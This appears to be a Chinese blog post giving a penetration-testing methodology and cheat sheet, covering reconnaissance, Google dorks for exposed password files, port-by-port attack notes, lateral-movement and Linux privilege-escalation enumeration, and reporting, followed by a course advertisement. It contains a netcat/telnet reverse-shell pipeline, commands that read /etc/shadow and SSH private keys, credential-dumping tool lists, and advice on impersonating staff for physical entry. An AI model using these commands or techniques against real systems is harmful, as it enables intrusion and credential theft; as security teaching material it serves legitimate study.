这个世界上只有两种人,黑客和被黑客攻击的人。
Ax 收集范围阶段
渗透测试之前,必须确认授权的测试范围,哪些是能测试的,哪些是不能测试的。将测试的目标收集到一个备忘录中。
Bx 测试目标阶段
确定范围后,针对范围进行测试。
1. 域名相关信息
whois
Whois 是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期
等)。通过域名Whois服务器查询,可以查询域名归属者联系方式,以及注册和到期时间。
可以使用命令,也可以使用在线:
whois,whois是互联网的一个协议,用工具也行,用命令行也行,网页在线也行,都可以。
在线:
- http://whois.chinaz.com/
- https://www.virustotal.com/gui/home/url
- https://www.threatminer.org/
DNS
DNS信息,在收集DNS信息的时候,主要关注域名注册商,管理员联系方式,电话和邮箱,子域名信息等。
(1)ip138:https://site.ip138.com/ https://ipchaxun.com/
(2)百度云观测:http://ce.baidu.com/index/getRelatedSites?site_address=baidu.com
(3)circl:https://www.circl.lu/services/passive-dns/#passive-dns
(4)hackertarget:https://hackertarget.com/find-dns-host-records/
(5)riddler:https://riddler.io/search?q=pld:baidu.com
(6)bufferover:https://dns.bufferover.run/dns?q=.baidu.com
(7)dnsdb:https://dnsdb.io/zh-cn/search?q=baidu.com
(8)ipv4info:http://ipv4info.com/
(9)robtex:https://www.robtex.com/dns-lookup/
(10)chinaz:https://alexa.chinaz.com/
(11)netcraft:https://searchdns.netcraft.com/
(12)securitytrails:https://docs.securitytrails.com/v1.0/reference#get-domain
(13)dnsdumpster:https://dnsdumpster.com/
(14)sitedossier:http://www.sitedossier.com/
(15)threatcrowd:https://www.threatcrowd.org/
(16)siterankdata:https://siterankdata.com/
(17)findsubdomains:https://findsubdomains.com/
企业查
小蓝本
启信宝
搜赖网
天眼查
企查查
信用视界
备案
天眼查 https://www.tianyancha.com
备案查询https://www.beian88.com/
2. 挖掘隐藏目录
扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏
robots.txt:指定了网站中不想被robot访问的目录
网站备份文件:网站源码、配置文件、数据库文件
后台目录:弱口令,万能密码,爆破
安装包:获取数据库信息,甚至是网站源码
上传目录:截断、上传图片马等
mysql管理接口:弱口令、爆破,万能密码,然后脱裤,甚至是拿到shell
安装页面 :可以二次安装进而绕过
phpinfo:会把目标配置的各种信息暴露出来
编辑器:fck、ke、等
IIS短文件利用:条件比较苛刻 Windows、Apache等
探测目标网站后台目录可以通过字典扫描、目录爬行、开源程序、搜索引擎、二级域名、端口站点、备份文件等方式查找,相关工具有:
IntelliTamper、wwwscan 、御剑 、weakfilescan、 dirbuster、dirb、QWASP、Google Hacking等
后台
物理路径探测
对目标写入webShell时需要用到真实物理路径。
1 探针文件
很多网站在搭建时会留下包含有网站信息的文件,说明等。常见的探针遗留文件名
Phpinfo.php
info.php
test.php
2 报错获得
多用于容错做的不是很好的网站。可以访问404页面、动态URL加特殊符号(英文单引号等)、错误的SQL语句等。
3 后台获得
如果可以登录到目标后台,一般后台首页会有一些说明,包括CMS版本、支持的组件、更新日期、数据库信息、物理路径、IP地址等。
4 IIS 高版本特性
IIS7-IIS8.5 如果配置不当,都有可能会存在这个问题,只有访问404的路径,就会爆出物理路径和IIS版本信息。
5 搜索引擎探测
Mail服务器
Mail服务器可能会有web漏洞:比如:XSS、SQL、XXE、心脏出血、破壳漏洞等等。mail弱口令爆破,mail钓鱼,mail可能是外网入
口,因为传递VPN密码,服务器密码等等。
敏感文件泄露
利用github、gitee等代码托管平台
• CMS识别
• git源码泄露
• svn源码泄露
• hg源码泄漏
• 网站备份压缩文件
• WEB-INF/web.xml 泄露
• DS_Store 文件泄露
• SWP 文件泄露
• CVS泄露
• Bzr泄露
• GitHub源码泄漏
• php特性配置说明文件composer.json泄露
利用搜索引擎
“Login: ” “password =” filetype: xls ( 搜索存储在excel文件中含有password的数据)。 allinurl: auth_user_file.txt (搜索包含在服务器上的 auth_user_file.txt 的文件)。 filetype: xls inurl: “password.xls” (查找 用户名和密码以excel格式)这个命令可以变为“admin.xls”. intitle: login password (获取登陆页面的连接,登陆关键词在标题中。) intitle: “Index of” master.passwd (密码页面索引) index of / **backup** ( 搜索服务器上的备份文件) intitle: index.of people.lst (包含people.list的网页) intitle: index.of passwd.bak ( 密码备份文件) intitle: “**Index** **of**” pwd.db (搜索数据库密码文件). intitle: “**Index** **of** .. etc” passwd (安装密码建立页面索引). index.of passlist.txt (以纯文本的形式加载包含passlist.txt的页面). index.of.secret (显示包含机密的文档,.gov类型的网站除外) 还可以使用: index.of.private filetype: xls username **password** email (查找表格中含有username和**password**的列的xls文件). ”*# PhpMyAdmin MySQL-Dump” filetype: txt (列出包含敏感数据的基于php的页面)* inurl: ipsec.secrets-history-bugs (包含只有超级用户才有的敏感数据). 还有一种旧的用法 inurl: ipsec.secrets “holds **shared** secrets” inurl: ipsec.conf-intitle: manpage inurl: “wvdial.conf” intext: “**password**” (显示包含电话号码,用户名和密码的连接。) inurl: “user.xls” intext: “**password**” (显示用户名和密码存储在xls的链接。) filetype: ldb **admin** (web服务器查找存储在数据库中没有呗googledork删去的密码。) inurl: **search** / admin.php (查找**admin**登陆的php页面). 如果幸运的话,还可以找到一个管理员配置界面创建一个新用户。 inurl: password.log filetype:**log** (查找特定链接的日志文件。) filetype: reg HKEY_CURRENT_USER username (在HCU (Hkey_Current_User)路径中查找注册表文件(registyry)。) “**Http**://username: **password** @ www …” filetype: bak inurl: “htaccess | passwd | shadow | ht **users**”(查找备份文件中的用户名和密码。) filetype:ini ws_ftp pwd (通过ws_ftp.ini 文件查找**admin**用户的密码) intitle: “**Index** **of**” pwd.db (查找加密的用户名和密码) inurl:**admin** inurl:**backup** intitle:index.of (查找关键词包含**admin**和**backup**的目录。) “**Index** **of**/” “**Parent** **Directory**” “WS _ FTP. ini” filetype:ini WS _ **FTP** PWD (WS_FTP 配置文件, 可以获取**FTP**服务器的进入权限) ext:pwd inurl:(service|**authors**|administrators|**users**) “*# -FrontPage-”* filetype: **sql** ( “passwd **values** *” |” **password** **values** *” | “pass **values** **“) 查找存储在数据库中的**sql**代码和密码。 )
3. 挖掘开放子域
使用工具
Sylas https://github.com/Acmesec/Sylas
SubDomainsBrute
wydomain https://github.com/ring04h/wydomain.git
layer
御剑
7kbscan
dnsenum
oneforall:https://github.com/shmilylty/OneForAll
4. 端口开放服务
使用工具 nmap
常见端口 3306 mysql 1433 mssql 1521 oracle 5432 postgresql 6379 redis 27017 mongodb 8080 tomcat/resin/jetty 137 samba 5900 vnc 443 https 21 FTP弱密码 22 SSH弱密码 23 telnet弱密码 25 邮件伪造,vrfy/expn查询邮件用户信息,可使用smtp-user-enum工具来自动跑 53 DNS溢出、远程代码执行、允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控 69 尝试下载目标及其的各类重要配置文件 80 IIS6 RCE 80-89 应用服务器端口 110 POP3 可尝试爆破,嗅探 111 NFS 权限配置不当 137 SMB 143 IMAP 爆破 161 SNMP 爆破默认团队字符串,搜集目标内网信息 139 smb、嗅探 161 snmp默认团体名/弱口令漏洞 389 LDAP注入、匿名访问、弱口令 443 poodle漏洞、应用服务器端口 445 ms17-010、ms08-067 464 kpasswd Kerberos 口令和钥匙改换服务 512,513,514 Linux rexec 可爆破,rlogin登陆 554 RTSP 873 rsync 1080 ss 可以尝试使用ss代理工具进行代理 1194 OpenVPN 想办法钓VPN账号,进内网 1352 Lotus 弱口令,信息泄漏,爆破 1433 mssql(sql server) 注入,提权,sa弱口令,爆破 1500 ISPmanager 弱口令 1521 Oracle tns爆破,注入,弹shell… 1723 PPTP 爆破,想办法钓VPN账号,进内网 2082,2083 cPanel 弱口令 2049 NFS 权限配置不当 2181 Zookeeper 2375 docker 2601,2604 Zebra 默认密码zerbra 3000 grafan 3128 Squid 弱口令 3306 mysql弱密码 3312,3311 kangle 弱口令 3389 ms12-020、Windows rdp shift后门[需要03以下的系统]、爆破 3690 svn泄露,未授权访问 4848 GlassFish 弱口令 4899 radmin 5000 Flask、Sybase/DB2 爆破,注入 5432 postgresql 爆破,注入,弱口令 5900,5901,5902 VNC 弱口令爆破 VNC提权 5984 couchdb 5985 SOAP 6379 redis未授权访问 6443 Kubernetes 7001 weblogic、websphere 7002 WebLogic Java反序列化,弱口令 7778 Kloxo 主机面板登录 8000 Ajenti 弱口令 8069 Zabbix 远程执行,SQL注入 8080 jenkins、GeoServer、Kubernetes、JBOSS、libssh、poodle 8180 libssh - cve-2018-10933、JBOSS 8393、8983、8081、80、443、8080 solr 8443 Plesk 弱口令 8440-8450,8080-8089 应用服务器端口(可尝试经典的topn,vpn,owa,webmail,目标oa,各类Java控制台,各类服务器Web管理面板,各类Web中间件漏 洞利用,各类Web框架漏洞利用等等……) 8161 ActiveMQ后台弱密码(admin/admin)漏洞以及put写shell 9080-9081,9090 WebSphere(应用服务器) Java反序列化/弱口令 9043 、9443 poodle 9200,9300 Elasticsearch未授权访问漏洞、elasticsearch远程命令执行、Elasticsearch任意文件读取 11211 memcache 27017,27018 mongodb 43958 Serv-U 50070,50030 hadoop 61616 ActiveMQ
5. 识别指纹信息
Whatweb https://www.yunsee.cn/ BugScaner:http://whatweb.bugscaner.com/look/ 云悉指纹:http://www.yunsee.cn/finger.html WhatWeb:https://whatweb.net/ cmsmap:https://github.com/dionach/CMSmap kali wpScan:针对WordPress版本网站 kali joomScan:针对Joomla!版本网站 whatweb:https://github.com/urbanadventurer/WhatWeb 在线cms识别:http://whatweb.bugscaner.com 潮汐指纹:http://finger.tidesec.net/ 数字观星:https://fp.shuziguanxing.com/#/ 云悉:http://www.yunsee.cn/finger.html Wappalyzer:https://github.com/AliasIO/wappalyzer http://whatweb.bugscaner.com/look/
6. 寻找真实地址
思路
网站识别(多地ping、国外ping、超级ping)。17ce.com
邮箱。
证书。
备案。
接口。https://get-site-ip.com/
SSRF记录。 a服务器开启日志 b发生ssrf请求a 被记录真实IP
测试文件扫描。
敏感文件。如phpinfo。真实IP泄露
黑暗引擎(FOFA)。icon识别一下。
全网扫描。https://github.com/Tai7sy/fuckcdn
RSS订阅。
APP反编译搜索/截取APP的请求信息。
修改hosts文件指向。
超级ping在线:
https://www.itdog.cn/ 推荐
https://ping.sx/ 极力推荐
http://ping.chinaz.com/
http://ping.aizhan.com/
http://ce.cloud.360.cn/
http://ping.chinaz.com/
http://ping.aizhan.com/
http://ce.cloud.360.cn/
https://www.17ce.com/
7. 识别防御设施
发现WAF的方法
- 手工:提交恶意数据
- 工具:WAFW00F、Nmap、Sqlmap
8. 社会工程艺术
QQ、weibo、支付宝、脉脉、领英、咸鱼、短视频、人人、贴吧、论坛
外网信息
有些人喜欢把自己的生活传到外网
推特、ins、fb等
当然,有句话,在互联网上,没有你查不到的信息。tg,sgk。。你懂的。
另外,近源攻击也是一种手段,伪装成客服,或内部员工绕过前台,进入机房。
通俗的说,就是一个字,钓鱼,骗,人类心理弱点。
具体可参见《欺骗的艺术》
9. 善用搜索引擎
→ google .com
→ Shodan .io
→ Censys .io
→ Hunter .io
→ redhuntlabs .com
→ fullhunt .io
→ onyphe .io
→ fofa .so
→ socradar .io
→ synapsint .com
→ binaryedge .io
→ ivre .rocks
→ crt .sh
→ spyse .com
→ vulners .com
→ PublicWWW .com
→ Pulsedive .com
→ ZoomEye .org
→ intelx .io
→ WiGLE .net
→ reposify .com
→ viz. greynoise .io
空间测绘
Shodan
FoFa
ZoomEye
Hunter
360Quake
10. 扩展思路
网盘泄露
公众号
小程序
Cx 内网横向阶段
1、用户列表
windows用户列表 分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户
2、进程列表
析杀毒软件/安全监控工具等 邮件客户端 VPN ftp等
3、服务列表
与安全防范工具有关服务[判断是否可以手动开关等] 存在问题的服务[权限/漏洞]
4、端口列表
开放端口对应的常见服务/应用程序[匿名/权限/漏洞等] 利用端口进行信息收集
5、补丁列表
分析 Windows 补丁 第三方软件[Java/Oracle/Flash 等]漏洞
6、本机共享
本机共享列表/访问权限 本机访问的域共享/访问权限
7、本用户习惯分析
历史记录 收藏夹 文档等
8、获取当前用户密码工具
Windows
• mimikatz
• wce
• Invoke-WCMDump
• mimiDbg
• LaZagne
• nirsoft_package
• QuarksPwDump fgdump
• 星号查看器等
Linux
• LaZagne
• mimipenguin
浏览器
• HackBrowserData
• SharpWeb
• SharpDPAPI
• 360SafeBrowsergetpass
其他
• SharpDecryptPwd
• Decrypt_Weblogic_Password
• OA-Seeyou
常见命令
ipconfig: ipconfig /all ------> 查询本机 IP 段,所在域等 net: net user ------> 本机用户列表 net localgroup administrators ------> 本机管理员[通常含有域用户] net user /domain ------> 查询域用户 net group /domain ------> 查询域里面的工作组 net group "domain admins" /domain ------> 查询域管理员用户组 net localgroup administrators /domain ------> 登录本机的域管理员 net localgroup administrators workgroup\user001 /add ----->域用户添加到本机 net group "Domain controllers" -------> 查看域控制器(如果有多台) net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表 net view /domain:domainname dsquery dsquery computer domainroot -limit 65535 && net group "domain computers" /domain ------> 列出该域内所有机器名 dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名 dsquery subnet ------>列出该域内网段划分 dsquery group && net group /domain ------>列出该域内分组 dsquery ou ------>列出该域内组织单位 dsquery server && net time /domain------>列出该域内域控制器
Dx 内网提权阶段
提权前的信息收集
操作系统
发行类型 版本
cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian cat /etc/redhat-release # Redhat
内核版本 32位还是64位
cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz-
查看环境变量 环境变量中可能存在密码或API密钥
cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set
路径(Path) 如果对该变量内的任何文件夹都具有写权限,则可以劫持某些库或二进制
文件:PATH echo $ PATH
查看打印机有无
lpstat -a
应用与服务
哪些服务正在运行?
哪个服务具有哪个用户特权?
ps aux ps -ef top cat /etc/services
root正在运行哪些服务?在这些易受攻击的服务中,值得仔细检查!
ps aux | grep root ps -ef | grep root
安装了哪些应用程序?他们是什么版本的?他们目前在运行吗?
ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/
服务设置是否配置错误?是否附有(脆弱的)插件?
cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
计划了哪些工作?(计划任务)
crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root
是否有纯文本用户名和/或密码?
检查Web服务器连接到数据库的文件(config.php或类似文件)
检查数据库以获取可能被重用的管理员密码
检查弱密码
grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
通讯与网络
系统具有哪些NIC?它是否连接到另一个网络?
/sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network
查看网络配置设置,确定关于该网络的信息,DHCP服务器?DNS服务器?网关?
cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname
其他哪些用户和主机正在与系统通信?
在这种情况下,用户正在运行某些只能从该主机获得的服务。我们无法从外部连接到服务。它可能是开发服务器,数据库或其他任何东西。这些服务可能以root用户身份运行, 或者其中可能存在漏洞。
netstat -anlp netstat -ano bash lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w
IP和/或MAC地址
arp -e route /sbin/route -nee
数据包嗅探是否可能?可以看到什么?
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21 注意:tcpdump tcp dst [ip] [端口]和tcp dst [ip] [端口]
我们有shell吗?
nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets sys 是否可以进行端口转发?重定向流量并与之交互
注意:FPipe.exe -l [本地端口] -r [远程端口] -s [本地端口] [本地IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 注意:ssh-[L / R] [本地端口]:[远程IP]:[远程端口] [本地用户] @ [本地IP] ssh -L 8080:127.0.0.1:80 root\@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root\@192.168.1.7 # Remote Port
注意:mknod backpipe p; nc -l -p [远程端口] backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost
可以使用隧道吗?在本地远程发送命令
ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig
机密信息和用户
id who w last cat /etc/passwd \| cut -d: -f1 \ # List of users grep -v -E "^#" /etc/passwd | cat /etc/sudoers sudo -l
可以找到哪些敏感文件?
cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/
home/root目录有什么”有用”的地方吗?如果可以访问
ls -ahlR /root/ ls -ahlR /home/
里面有密码吗?脚本,数据库,配置文件还是日志文件?密码的默认路径和 位置
cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg
用户正在做什么?是否有纯文本密码?他们在编辑什么?
cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history
用户信息
cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root
私钥信息
cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key
文件系统
可以在/ etc /中写入哪些配置文件?能够重新配置服务?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
在/ var /中可以找到什么?
ls -alh /var/log ls -alh /var/mail ls -alh /var/spool ls -alh /var/spool/lpd ls -alh /var/lib/pgsql ls -alh /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases
网站上是否有任何设置/文件(隐藏)?有数据库信息的任何设置文件吗?
ls -alhR /var/www/ ls -alhR /srv/www/htdocs/ ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ ls -alhR /var/www/html/
日志文件中是否有任何内容(可以帮助”本地文件包含”)
cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat /var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/
Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, m
如果命令受到限制,获取交互shell
python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i是否存在安装文件系统?
mount df -h
是否有任何卸载的文件系统?
cat /etc/fstab
“Linux文件权限”是什么?
find / -perm -1000 -type d 2>/dev/null find / -perm -g=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
可以在哪里写入和执行?一些“常见”位置:/ tmp,/ var / tmp,/ dev / shm
find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders find / -perm -o x -type d 2>/dev/null # world-executable folders find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable
任何”问题”文件吗?Word可写的”没人”文件
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print find /dir -xdev \( -nouser -o -nogroup \) -print
准备和查找漏洞利用代码
安装/支持哪些开发工具/语言?
find / -name perl\* find / -name python\* find / -name gcc\* find / -name cc
如何上传文件?
find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp
系统是否已完全打补丁?
内核,操作系统,所有应用程序,其插件和Web服务
使用工具
windows内核漏洞提权
检测网址:http://bugs.hacking8.com/tiquan/
检测类:Windows-Exploit-Suggester,WinSystemHelper,wesng
利用类:windows-kernel-exploits,BeRoot
Ex 撰写报告阶段
将收集到的信息,利用模板进行编写报告内容。
一个合格的渗透测试报告,包含规范,如目标,受众,时间,密级等等
信息收集包括自己渗透测试成功的漏洞证明,包括截图和时间戳,脚本,日志记录,方便复现。
对于甲方而言,应当将报告的内容写得更加通俗易懂,而非技术实现,如漏洞的产生造成危害,如何修复等。
对于技术人员,应当将报告的内容写得更加专业,如复现步骤,原理和详细的修复方案。
当然,信息收集远远不止以上列举,仅仅提供些许思路,更多思路欢迎指点。
网络安全基础入门需要学习哪些知识?
网络安全学习路线
这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!
阶段一:基础入门
网络安全导论
渗透测试基础
网络基础
操作系统基础
Web安全基础
数据库基础
编程基础
CTF基础
该阶段学完即可年薪15w+
阶段二:技术进阶(到了这一步你才算入门)
弱口令与口令爆破
XSS漏洞
CSRF漏洞
SSRF漏洞
XXE漏洞
SQL注入
任意文件操作漏洞
业务逻辑漏洞
该阶段学完年薪25w+
阶段三:高阶提升
反序列化漏洞
RCE
综合靶场实操项目
内网渗透
流量分析
日志分析
恶意代码分析
应急响应
实战训练
该阶段学完即可年薪30w+
阶段四:蓝队课程
蓝队基础
蓝队进阶
该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。
攻防兼备,年薪收入可以达到40w+
阶段五:面试指南&阶段六:升级内容
需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容
同学们可以扫描下方二维码获取哦!
![[工业自动化-1]:PLC架构与工作原理](https://img-blog.csdnimg.cn/ce10a1471ed14382bc58364cf8bd5209.png)
还没有评论,来说两句吧...